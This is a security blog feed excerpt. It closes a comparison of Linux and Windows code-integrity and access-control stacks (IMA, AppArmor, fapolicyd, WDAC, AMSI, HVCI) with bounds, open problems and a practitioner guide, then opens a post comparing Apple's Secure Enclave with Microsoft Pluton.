&lt;p&gt;The IPE documentation [@docs-kernel-org-lsm-ipehtml] lists this as an explicit limitation: a property-based check on the file the JIT compiled does not authenticate the bytes the JIT emitted. WDAC&apos;s User-Mode Code Integrity has the same gap for managed runtimes that emit IL at runtime. There is no production answer on either side; there are only mitigations: disable JITs where possible, run them in restricted runtimes (Constrained Language Mode), block the trampolines.The JIT gap is one reason both stacks ship &quot;Constrained Language Mode&quot;-style restricted-runtime options. PowerShell&apos;s Constrained Language Mode blocks reflection and dynamic-type creation; the JVM&apos;s &lt;code&gt;--module-path&lt;/code&gt; and module-system encapsulation play a similar role for hosted Java code; the CLR&apos;s AppContainer and the .NET Core trim modes lean the same way. None of these &quot;verify&quot; the JIT output; they restrict what the runtime is willing to emit.&lt;/p&gt;
&lt;h3&gt;Cryptographic bounds&lt;/h3&gt;
&lt;p&gt;The cryptographic side, by contrast, is closed.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Any preimage-resistant hash needs $\Omega(n)$ work on the data being hashed. You cannot verify a file you do not read.&lt;/li&gt;
&lt;li&gt;A Merkle tree with leaf size $k$ over a file of size $n$ reduces this to $O(\log(n/k))$ per partial read. The classic Merkle 1979 construction underlies dm-verity, fs-verity, and the Android APK Signature Scheme v4. &lt;strong&gt;fs-verity matches this lower bound.&lt;/strong&gt;&lt;/li&gt;
&lt;li&gt;Whole-file SHA-256 on modern x86 with SHA-NI runs at roughly $2 \text{ GB/s}$ per core; SHA-512 at $\sim 1.4 \text{ GB/s}$. A 100 MB binary verifies in roughly $50 \text{ ms}$ worst-case and $0 \text{ ms}$ cached. RSA-2048 and Ed25519 signature verification both finish in well under a millisecond on modern hardware (tens to a few hundred microseconds depending on CPU and library); verify cost is not the bottleneck.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So on the &lt;em&gt;crypto&lt;/em&gt; side the gap between upper and lower bounds is closed. On the &lt;em&gt;policy-expressiveness&lt;/em&gt; side there is no &quot;best&quot; policy because the right policy depends on threat model. There is no Pareto frontier; there are only trade-offs.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Bound&lt;/th&gt;
&lt;th&gt;What it says&lt;/th&gt;
&lt;th&gt;Mechanism that matches it&lt;/th&gt;
&lt;th&gt;Remaining gap&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Rice&apos;s theorem&lt;/td&gt;
&lt;td&gt;&quot;Is this binary malicious?&quot; is undecidable&lt;/td&gt;
&lt;td&gt;Every CI stack is an allowlist + signer model&lt;/td&gt;
&lt;td&gt;Allowlist composition is itself a policy problem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;In-process secret&lt;/td&gt;
&lt;td&gt;No purely-software defence inside the attacker&apos;s address space&lt;/td&gt;
&lt;td&gt;HVCI moves verifier to VTL1; EVM key in keyring sealed to TPM&lt;/td&gt;
&lt;td&gt;AMSI design violates this; the gap is structural&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Hash verification&lt;/td&gt;
&lt;td&gt;$\Omega(n)$ per full read; $O(\log n)$ per partial read&lt;/td&gt;
&lt;td&gt;fs-verity per page; IMA cached on &lt;code&gt;i_iversion&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Cold-cache cost remains O(n) for non-fs-verity files&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;JIT and dynamic code&lt;/td&gt;
&lt;td&gt;No way to verify code that did not exist on disk&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Restricted-runtime modes (CLM, AppContainer) are the best partial answer&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Asymmetric verify&lt;/td&gt;
&lt;td&gt;About 60-300 us per RSA-2048 or Ed25519 verify on modern x86&lt;/td&gt;
&lt;td&gt;Authenticode catalogues amortise; IMA caches in inode&lt;/td&gt;
&lt;td&gt;Cold cache is the only sensitive case&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Crypto is closed. Policy expressiveness and trust-boundary protection are theoretically unsolvable in general. Every stack is an allowlist plus a trusted-signer model, never a malware detector. The wall is theoretical, not engineering.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the theory says we cannot win, what is research targeting in 2026?&lt;/p&gt;
&lt;h2&gt;9. Open frontiers&lt;/h2&gt;
&lt;p&gt;Three problems define the 2026 research front. All are being worked on upstream. None will dissolve the theoretical bounds of Section 8.&lt;/p&gt;
&lt;h3&gt;Linux integrity at distribution scale: the Integrity Digest Cache&lt;/h3&gt;
&lt;p&gt;IMA appraisal has a scale problem. On a general-purpose Linux distribution where every file is RPM-signed, asking IMA to verify a per-file &lt;code&gt;imasig&lt;/code&gt; signature on every &lt;code&gt;open&lt;/code&gt; is expensive.&lt;/p&gt;
&lt;p&gt;Roberto Sassu (Huawei Cloud) proposed a fix as the &lt;code&gt;digest_cache&lt;/code&gt; LSM in version 3 of the patchset, posted in February 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom] and covered on LWN [@lwn-net-articles-961591]. The v3 cover letter is concrete: &quot;Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read.&quot; The design extracts pre-computed reference digests from vendor-signed digest lists (RPM headers, kernel TLV digest-list format, third-party formats via loadable parsers) and exposes a &lt;code&gt;digest_cache_lookup()&lt;/code&gt; primitive that integrity providers (IMA, IPE, BPF LSM) call instead of verifying per-file signatures.&lt;/p&gt;
&lt;p&gt;By v6 in November 2024 [@lore-kernel-org-1-robertosassuhuaweicloudcom-2] the work had been retitled &quot;Introduce the Integrity Digest Cache&quot; and pivoted from a standalone LSM into an integrity-subsystem helper, in response to maintainer feedback. The v6 cover letter quantifies the baseline the design attacks: IMA measurement &quot;introduces a noticeable overhead (up to 10x slower in a microbenchmark) on frequently used system calls, like the open().&quot; Discussion continues on the linux-integrity list [@lore-kernel-org-linux-integrity]; memory safety of the TLV parser was verified with the Frama-C [@frama-c-com] static analyser. As of late 2024 the work is not yet upstream.&lt;/p&gt;

Preliminary tests have shown a speedup of IMA appraisal of about 65% for sequential read, and 45% for parallel read. -- Roberto Sassu, digest_cache LSM v3 cover letter, February 2024
&lt;p&gt;The important framing correction: the Integrity Digest Cache is &lt;strong&gt;not&lt;/strong&gt; a Linux AMSI equivalent. AMSI is an interpreter-side scanner of the deobfuscated, about-to-execute script buffer. The Integrity Digest Cache is a file-content digest delivery mechanism that closes the same gap IMA already closes, but more efficiently and at distribution scale. The Linux script-content gap remains genuinely open.&lt;/p&gt;
&lt;h3&gt;Out-of-process AMSI broker&lt;/h3&gt;
&lt;p&gt;The conjectural fix on the Windows side is an out-of-process AMSI broker: every &lt;code&gt;AmsiScanBuffer&lt;/code&gt; call IPCs to a service running outside the script host&apos;s address space. The in-process bypass family disappears because the attacker is no longer in the same process as the scanner. The cost is a context switch and serialisation overhead per script eval.&lt;/p&gt;
&lt;p&gt;Microsoft has layered partial mitigations -- signed AMSI provider DLLs from 1903, ETW patch detection in Defender, Constrained Language Mode under App Control -- but no full out-of-process redesign exists. Whether it ever will is a function of how willing Microsoft is to pay the latency cost on hot PowerShell loops.&lt;/p&gt;
&lt;h3&gt;Cross-OS attestation&lt;/h3&gt;
&lt;p&gt;A verifier validating evidence from a mixed Linux + Windows fleet today must speak two languages at once. IMA&apos;s measurement-log format (&lt;code&gt;ima_template_fmt&lt;/code&gt;) and &lt;a href=&quot;https://paragmali.com/blog/measured-boot-the-tcg-event-log-from-srtm-to-pcr-bound-bitlo/&quot; rel=&quot;noopener&quot;&gt;Windows Measured Boot&lt;/a&gt;&apos;s WBCL [@trustedcomputinggroup-org-log-format] both target TPM PCRs but encode events differently.&lt;/p&gt;
&lt;p&gt;Confidential-computing efforts (Intel TDX, AMD SEV-SNP) are pushing toward a common report/quote primitive at the platform layer, and the TCG Canonical Event Log Format aims at a portable per-entry representation. Workload-level integrity proofs remain stack-specific. The two operating systems do not yet speak a common attestation language.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Problem&lt;/th&gt;
&lt;th&gt;Current best partial result&lt;/th&gt;
&lt;th&gt;Upstream status&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;IMA appraisal scale on RPM-signed distros&lt;/td&gt;
&lt;td&gt;Integrity Digest Cache, 45-65% appraisal speedup&lt;/td&gt;
&lt;td&gt;Patchset v6 (Nov 2024); not upstream&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AMSI in-process trust boundary&lt;/td&gt;
&lt;td&gt;Signed provider DLLs, ETW patch detection, CLM&lt;/td&gt;
&lt;td&gt;Partial; structural fix would be OOP broker&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Linux script-content scanning&lt;/td&gt;
&lt;td&gt;Nothing in production&lt;/td&gt;
&lt;td&gt;Open&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cross-OS attestation interop&lt;/td&gt;
&lt;td&gt;TCG CEL, TDX/SEV-SNP quotes&lt;/td&gt;
&lt;td&gt;Platform-layer; workload-level still split&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WDAC LOLBin treadmill&lt;/td&gt;
&lt;td&gt;Microsoft block list + LOLBAS + WDAC Wizard&lt;/td&gt;
&lt;td&gt;Operational; structural fix unknown&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Each of these will probably ship in the 2026-2028 window. None of them dissolves the theoretical bounds of Section 8. The job for a defender in 2026 is therefore &lt;strong&gt;operational&lt;/strong&gt;, not technological.&lt;/p&gt;
&lt;h2&gt;10. Practitioner decision guide&lt;/h2&gt;
&lt;p&gt;Eight common deployment scenarios. Eight concrete answers.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;If you need...&lt;/th&gt;
&lt;th&gt;On Linux, use...&lt;/th&gt;
&lt;th&gt;On Windows, use...&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;TPM-backed remote attestation&lt;/td&gt;
&lt;td&gt;IMA + EVM (TPM PCR 10)&lt;/td&gt;
&lt;td&gt;Measured Boot + TPM PCR 11 + HVCI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Block unsigned drivers&lt;/td&gt;
&lt;td&gt;&lt;code&gt;module.sig_enforce=1&lt;/code&gt; plus kernel module signing&lt;/td&gt;
&lt;td&gt;HVCI (Memory Integrity)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cryptographic allowlist of installed software&lt;/td&gt;
&lt;td&gt;fapolicyd (RPM/DEB trust)&lt;/td&gt;
&lt;td&gt;App Control with Publisher rules&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Per-app sandbox&lt;/td&gt;
&lt;td&gt;AppArmor or SELinux&lt;/td&gt;
&lt;td&gt;AppContainer or App Control (no direct equivalent)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Catch in-memory PowerShell payloads&lt;/td&gt;
&lt;td&gt;(no direct equivalent)&lt;/td&gt;
&lt;td&gt;AMSI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Consumer-grade reputation gating&lt;/td&gt;
&lt;td&gt;(no direct equivalent)&lt;/td&gt;
&lt;td&gt;Smart App Control&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Immutable appliance image&lt;/td&gt;
&lt;td&gt;dm-verity + IPE&lt;/td&gt;
&lt;td&gt;App Control with hash rules + HVCI&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Large APK-style assets verified lazily&lt;/td&gt;
&lt;td&gt;fs-verity&lt;/td&gt;
&lt;td&gt;(no direct equivalent)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The why behind each row.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;TPM-backed attestation.&lt;/strong&gt; On Linux, IMA&apos;s measurement mode extends file hashes into PCR 10 and ships the measurement log to a remote verifier (Keylime, Veraison). On Windows it means consuming the Measured Boot event log a Windows kernel emits while VBS+HVCI is enabled. Both stacks target the same root of trust (the TPM) but speak different event formats.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Blocking unsigned drivers.&lt;/strong&gt; Linux uses a built-in kernel module signing flag. Windows needs HVCI, because the kernel-mode CI check runs in VTL1 and any policy weakening attempted from VTL0 with SYSTEM cannot reach it.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Application allowlisting on general-purpose distributions.&lt;/strong&gt; This is fapolicyd&apos;s wheelhouse: it inherits trust from the RPM/DEB database, which is the only place a general-purpose distro has a clean &quot;trusted&quot; list. On Windows, App Control with publisher rules plus a managed-installer policy is the equivalent.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Per-app sandboxing.&lt;/strong&gt; Clean Linux story (AppArmor or SELinux per binary). On Windows it is the gap App Control was never quite designed to fill; &lt;a href=&quot;https://paragmali.com/blog/appcontainer-and-lowbox-tokens-windowss-capability-sandbox/&quot; rel=&quot;noopener&quot;&gt;AppContainer&lt;/a&gt; or Microsoft Defender Attack Surface Reduction rules are the substitutes.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;In-memory PowerShell payloads.&lt;/strong&gt; AMSI&apos;s use case. Linux has nothing equivalent in production.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Consumer reputation gating.&lt;/strong&gt; Smart App Control&apos;s use case. Linux distros have nothing equivalent because the distribution-package model already plays that role.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Immutable appliance images.&lt;/strong&gt; Dm-verity plus IPE on Linux. App Control hash rules plus HVCI on Windows.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Large lazy-loaded assets.&lt;/strong&gt; Fs-verity territory; Windows has no public equivalent.&lt;/p&gt;
&lt;h3&gt;Common implementation pitfalls&lt;/h3&gt;
&lt;p&gt;Distilled from the same shape: every stack has a default that surprises operators.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;IMA without EVM and without a TPM-sealed key is decorative.&lt;/strong&gt; Hashing files into an xattr the attacker can rewrite buys you nothing against offline access. EVM is mandatory; the EVM key must be sealed.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AppArmor profiles authored in &lt;em&gt;complain&lt;/em&gt; mode never get promoted to &lt;em&gt;enforce&lt;/em&gt;.&lt;/strong&gt; Schedule a config-management pass that runs &lt;code&gt;aa-enforce&lt;/code&gt; on the profiles you actually want to confine.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SELinux &lt;code&gt;setenforce 0&lt;/code&gt; for debugging that becomes permanent.&lt;/strong&gt; The &lt;code&gt;/.autorelabel&lt;/code&gt; flag is required after restoring contexts; track that you flipped it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;fapolicyd permissive-mode lapses.&lt;/strong&gt; Set up alerting on &lt;code&gt;permissive=1&lt;/code&gt; in the runtime configuration; treat the daemon&apos;s exit status as a security event.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;WDAC&apos;s &lt;code&gt;Enabled:Audit Mode&lt;/code&gt; policy-rule option is on by default.&lt;/strong&gt; Policies silently do not enforce until you remove it. Add a deployment check that asserts audit mode is &lt;em&gt;off&lt;/em&gt; before declaring rollout complete.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;HVCI without a driver-compatibility check.&lt;/strong&gt; Microsoft&apos;s &lt;code&gt;DG_Readiness_Tool&lt;/code&gt; and the HVCI compatibility report belong in every pilot. Vendors that allocate RWX kernel pages will fail HVCI loading and leave the host unbootable.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Treating AMSI as a control.&lt;/strong&gt; It is telemetry. Budget for the bypass on day one.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Smart App Control disable is one-way.&lt;/strong&gt; A single mis-click ends the consumer reputation gate until the device is reset. Make sure the user understands this before they tap the toggle.&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; On Linux: enable IMA in &lt;code&gt;measure&lt;/code&gt; mode before &lt;code&gt;appraise&lt;/code&gt;; deploy AppArmor / SELinux profiles in &lt;em&gt;complain&lt;/em&gt; / &lt;em&gt;permissive&lt;/em&gt; before &lt;em&gt;enforce&lt;/em&gt;; run fapolicyd with &lt;code&gt;permissive=1&lt;/code&gt; for the first deploy. On Windows: leave WDAC&apos;s &lt;code&gt;Enabled:Audit Mode&lt;/code&gt; set during the first rollout and use the event log to identify the policy gaps before flipping to enforced. Audit mode is the only safe way to discover that the policy is wrong before it locks you out of production.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; A bare IMA appraisal policy without an HMAC-keyed EVM (and without the key sealed to a TPM 2.0 PCR set) does not stop an offline attacker. If you do not have TPM-sealed key custody and signed-xattr xattrs, IMA appraisal is mostly a check-box. fapolicyd with &lt;code&gt;integrity=ima&lt;/code&gt; may be a saner starting point on machines without TPM.&lt;/p&gt;
&lt;/blockquote&gt;

Usually no, unless your distribution signs every system file (most do not for `imasig` in production) and you have a TPM-sealed EVM key. For general-purpose servers, fapolicyd with RPM-database trust is usually the right answer; it inherits trust from packages you already trust and does not require kernel-side signature infrastructure. Reserve IMA appraise for appliance / fixed-function builds, embedded distros, or fleets with a signed-package pipeline.

Path-based reasoning maps to how administrators think about confinement: &quot;this binary may read /etc/nginx, may write /var/log/nginx, may bind a network socket.&quot; SELinux&apos;s type-enforcement model is more expressive (it lets a single rule cover an entire class of objects across paths and bind mounts), but it requires the administrator to think in compiled-policy terms. Both are correct; pick the one whose mental model matches your team. The right answer on Ubuntu and SUSE is almost always AppArmor; the right answer on RHEL and Android is almost always SELinux.

No. Microsoft&apos;s block list [@learn-microsoft-com-bypass-appcontrol] grows whenever a new signed binary turns out to host an attacker-friendly evaluator. Treat WDAC as defence-in-depth, layered with HVCI and AMSI-as-telemetry, not as a single-point allowlist. The WDAC Wizard and AaronLocker projects automate keeping the deny set current; even with them, expect the deny set to evolve every quarter.

Yes. Enable it, but configure it as a telemetry source feeding Defender for Endpoint and any EDR pipeline you operate. The bypass family of Section 7 is real, but the un-bypassed case still catches the long tail of script-based attacks that do not bother defeating AMSI, and the bypass attempt itself is highly detectable (in-memory patch ETW events). Treat AMSI alerts as detective controls, not preventive controls.

On CPUs with Intel MBEC (Kaby Lake or newer) or AMD GMET (Zen 2 or newer) [@learn-microsoft-com-oem-vbs], the steady-state overhead is generally under 5 percent. On older CPUs that rely on the Restricted User Mode emulation path, kernel-bound workloads can see 10 to 20 percent regressions. Run your specific kernel-bound benchmarks on the actual hardware before enabling on a fleet with a mixed CPU generation; &quot;free&quot; is a Kaby Lake-and-newer claim.

Usually no. SAC auto-disables on enterprise-managed devices (Intune-enrolled, Azure AD-joined, or under Group Policy management) at the end of the 48-hour evaluation window unless the user explicitly opts in. The intended deployment model is that enterprises use full App Control with a managed-installer policy, not SAC. If SAC has already auto-disabled and you actually want it on, the only path to re-enable is a clean install of Windows. A Settings &amp;gt; Reset This PC does not bring it back.
&lt;p&gt;The two architectures answer the same question with different trade-offs. A practitioner in 2026 needs both maps, because the bypass that breaks the Linux side rarely looks like the bypass that breaks the Windows side, and the mitigation that fixes one is rarely the mitigation that fixes the other.&lt;/p&gt;
&lt;p&gt;What stays constant is the lesson the two lineages converged on over fifteen years: the trust boundary is the architecture. Move the verifier out of reach. Allowlist the producers. Treat the things that cannot be moved as telemetry, not as control. None of that closes Rice&apos;s wall, but all of it pushes the actual exploitable surface back another mile, on both operating systems.&lt;/p&gt;
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;linux-ima-apparmor-vs-wdac-amsi-code-integrity-lineages&quot; keyTerms={[
  { term: &quot;IMA&quot;, definition: &quot;Linux Integrity Measurement Architecture. Hashes files at LSM hook points; can measure (record into TPM PCR 10), appraise (block on mismatch), or audit.&quot; },
  { term: &quot;EVM&quot;, definition: &quot;Extended Verification Module. HMACs (or signs) the security xattrs IMA depends on, so an offline attacker who rewrites security.ima cannot also forge security.evm.&quot; },
  { term: &quot;AppArmor&quot;, definition: &quot;Path-based Linux MAC, merged to mainline in 2.6.36 (Oct 2010). Default on Ubuntu and SUSE. Profiles are loaded from user space and compiled to in-kernel DFAs.&quot; },
  { term: &quot;SELinux&quot;, definition: &quot;Label-based Linux MAC merged to mainline in 2.6.0 (Dec 2003). Default on RHEL, Fedora, Oracle Linux, Android. Type-enforcement on subject x object x class.&quot; },
  { term: &quot;fapolicyd&quot;, definition: &quot;Red Hat userspace allowlister sitting on the fanotify permission channel. Trust inherited from the RPM database; rules in /etc/fapolicyd/rules.d/.&quot; },
  { term: &quot;fs-verity&quot;, definition: &quot;Per-file Merkle-tree authenticity, Linux 5.4 (Nov 2019). O(log n) per-page verification; constant-time digest retrieval; supported on ext4, f2fs, btrfs.&quot; },
  { term: &quot;IPE&quot;, definition: &quot;Integrity Policy Enforcement, Linux 6.12 (Nov 2024). Property-based decisions: dm-verity root hash, fs-verity digest, initramfs origin. O(1) per access.&quot; },
  { term: &quot;WDAC / App Control&quot;, definition: &quot;Windows code-integrity policy mechanism, originally Device Guard (Windows 10 1507). Signed XML compiled to .p7b, evaluated at PE load. Renamed App Control for Business in 2024.&quot; },
  { term: &quot;HVCI / Memory Integrity&quot;, definition: &quot;Hypervisor-Protected Code Integrity. Kernel-mode CI check moved into VTL1 of Hyper-V, isolated from the VTL0 normal kernel. Same mechanism marketed under three names.&quot; },
  { term: &quot;AMSI&quot;, definition: &quot;Antimalware Scan Interface. In-process script-broker COM API (AmsiScanBuffer) called by PowerShell, WSH, VBA, MSHTA, UAC installer, .NET. Provider is Defender by default.&quot; },
  { term: &quot;Smart App Control&quot;, definition: &quot;Consumer-facing pre-baked WDAC policy shipped with Windows 11 22H2. 48-hour evaluation window, one-way disable, cloud reputation via the Intelligent Security Graph.&quot; },
  { term: &quot;LSM&quot;, definition: &quot;Linux Security Modules. Kernel framework merged Dec 2003 that hosts security modules at well-defined hook points. Hosts SELinux, AppArmor, IMA, EVM, IPE, BPF LSM, Landlock.&quot; },
  { term: &quot;MAC&quot;, definition: &quot;Mandatory Access Control. Kernel-enforced policy layer above DAC that no userspace privilege can override; the operator, not the file owner, sets policy.&quot; },
  { term: &quot;TPM PCR 10&quot;, definition: &quot;The TPM Platform Configuration Register IMA extends file-content hashes into. Monotonic, extendable as PCR_new = SHA256(PCR_old || hash); used as the anchor for remote attestation.&quot; },
  { term: &quot;Authenticode&quot;, definition: &quot;Microsoft&apos;s PE signing format. Anchors WDAC&apos;s Publisher, PcaCertificate, and LeafCertificate rule kinds; signed catalogues (.cat) provide pre-computed hashes for catalogued files.&quot; },
  { term: &quot;LOLBin&quot;, definition: &quot;Living-Off-the-Land Binary. A trusted binary, often vendor-signed, repurposed by attackers to bypass an allowlist (e.g. mshta.exe evaluating an HTA blob).&quot; },
  { term: &quot;Constrained Language Mode&quot;, definition: &quot;Reduced PowerShell language mode App Control forces with UMCI on. Blocks reflection, dynamic-type creation, and arbitrary .NET API calls; restricts evaluation surface.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>security</category><category>linux</category><category>windows</category><category>code-integrity</category><category>mandatory-access-control</category><category>ima</category><category>wdac</category><category>amsi</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Apple Secure Enclave vs Microsoft Pluton: Two Roads to Hardware Root of Trust</title><link>https://paragmali.com/blog/apple-secure-enclave-vs-microsoft-pluton-two-roads-to-hardwa/</link><guid isPermaLink="true">https://paragmali.com/blog/apple-secure-enclave-vs-microsoft-pluton-two-roads-to-hardwa/</guid><description>How Apple SEP and Microsoft Pluton solve the same problem -- keeping your secrets safe from a compromised OS -- using two very different silicon strategies.</description><pubDate>Thu, 14 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Apple Secure Enclave and Microsoft Pluton solve the same problem -- keeping your keys, biometrics, and disk-encryption secrets safe even when the operating system is compromised -- by way of two different silicon strategies.** Apple gives the SEP its own physical CPU core, its own L4-derived microkernel (sepOS), and a mailbox API that no app can bypass. Microsoft drops Pluton onto the SoC die as a TPM 2.0-compatible subsystem patched through Windows Update. The differences shape everything downstream: who can patch the firmware, what attacks remain in scope, and which APIs developers actually call. This article walks through the architectures, the API surfaces, the published attacks (checkm8, LPC sniffing, faulTPM), and the cross-platform standards (FIDO2/WebAuthn) that paper over the divide.
&lt;h2&gt;1. The bus that taught everyone a lesson&lt;/h2&gt;
&lt;p&gt;In 2021, a researcher at Pulse Security wired a forty-dollar FPGA to the LPC bus of a Microsoft Surface Pro 3 and a Lenovo laptop, captured a handful of bytes as the machines powered on, and pulled the BitLocker Volume Master Key out of the air. Then they decrypted the drives. They wrote the whole thing up, with photos of the soldering and an open-source sniffer named &lt;code&gt;lpc_sniffer_tpm&lt;/code&gt; (Pulse Security: Sniff, there leaks my BitLocker key [@pulse-tpm-sniff]).&lt;/p&gt;
&lt;p&gt;The hardware was working exactly as designed.&lt;/p&gt;
&lt;p&gt;That is what makes the story interesting. The Trusted Platform Module released the disk-encryption key the moment the boot configuration matched its sealed policy. It then handed the key, in cleartext, to the CPU over a physical wire on the motherboard. Anyone who could touch that wire could read the key. The chip, the spec, the OS -- all of them did precisely what the standard required. The threat model just never accounted for somebody putting probes on a laptop.&lt;/p&gt;
&lt;p&gt;This is the problem hardware-rooted security has spent twenty years trying to dig itself out of. If you trust software, malware wins. If you trust software-plus-discrete-TPM, the bus wins. If you trust software-plus-firmware-TPM, the host operating system&apos;s privileged-mode bugs win. Every layer you add closes one class of attack and opens another.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Hardware roots of trust exist because no purely software-defined boundary can survive an attacker who runs code at the same privilege level you do. The only way out is to put the secrets somewhere your main CPU literally cannot read.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Apple and Microsoft both reached the same conclusion roughly a decade apart, and built almost opposite answers. Apple shipped the Secure Enclave Processor (SEP) with the A7 chip in the iPhone 5s in September 2013 [@apple-sep-chapter] -- a dedicated ARM core inside the application SoC, running its own microkernel, talking to the rest of the phone through a hardware mailbox. Microsoft announced Pluton in November 2020 [@ms-pluton-announce], but had been shipping Pluton-class silicon since the original Xbox One in 2013 [@ms-pluton-learn]; the Windows version is an on-die security subsystem that pretends to be a TPM 2.0 chip and accepts firmware updates over Windows Update.&lt;/p&gt;
&lt;p&gt;Both companies looked at the same threat -- a curious adversary with a screwdriver, an OS-level rootkit, or a $40 logic analyzer -- and decided the answer was to move the keys off the bus. They just disagreed about where to put them.&lt;/p&gt;

A piece of silicon that the rest of a system anchors its security claims to. Keys generated inside the RoT never leave; measurements taken by the RoT are signed by it; software running outside the RoT cannot rewrite the RoT&apos;s behavior. The &quot;root&quot; is the part the rest of the trust chain reduces down to.

A cryptoprocessor specified by the Trusted Computing Group. TPM 2.0 -- the current version, published in 2014 and revised since [@tcg-tpm2] -- defines Platform Configuration Registers (PCRs), an Endorsement Key burned at manufacture, key creation and sealing primitives, and the `TPM2_Quote` command for remote attestation. A TPM can be discrete (its own chip), firmware (running inside another security subsystem), or virtual.
&lt;p&gt;This article is the comparison nobody quite writes, partly because both vendors prefer to talk about themselves and partly because the technologies look superficially similar. They are not. The architectures differ. The threat models differ. The patch channels differ. The developer APIs differ enough that the same security goal -- &quot;store this key so nothing but the user&apos;s biometric can use it&quot; -- produces wildly different code on each side. By the end of this you should know which one is in your device, why it is there, what it actually defends against, and where the academic literature has already poked holes.&lt;/p&gt;

flowchart LR
    subgraph Discrete[&quot;Discrete TPM (sniffable bus)&quot;]
        CPU1[CPU] -- LPC/SPI --&amp;gt; TPM[Discrete TPM chip]
    end
    subgraph SEP[&quot;Apple SEP (separate core)&quot;]
        AP[Application Processor] -- mailbox --&amp;gt; SEPCore[SEP core + sepOS]
    end
    subgraph Pluton[&quot;Microsoft Pluton (on-die subsystem)&quot;]
        CPU2[CPU] -- on-die fabric --&amp;gt; PlutonSub[Pluton subsystem]
    end
&lt;p&gt;The journey from &quot;trust the OS&quot; to &quot;trust the silicon that even the OS cannot read&quot; is the story of the last fifteen years of platform security. The Surface Pro 3 attack is what happens when you do half of it. Apple&apos;s and Microsoft&apos;s answers are what it looks like when you do all of it -- in two opposite ways.&lt;/p&gt;
&lt;h2&gt;2. Apple&apos;s answer: a small computer inside your phone&lt;/h2&gt;
&lt;p&gt;The Apple Secure Enclave Processor is a separate physical CPU core, on the same die as the application processor, with its own memory, its own boot ROM, its own operating system, and its own random number generator. Apple&apos;s own framing in the Platform Security Guide [@apple-sep-chapter] is that the SEP &quot;provides the foundation for the secure generation and storage of the keys necessary for encrypting data at rest.&quot; That is what it does. &lt;em&gt;How&lt;/em&gt; it does it is what is interesting.&lt;/p&gt;
&lt;h3&gt;2.1 What sits on the die&lt;/h3&gt;
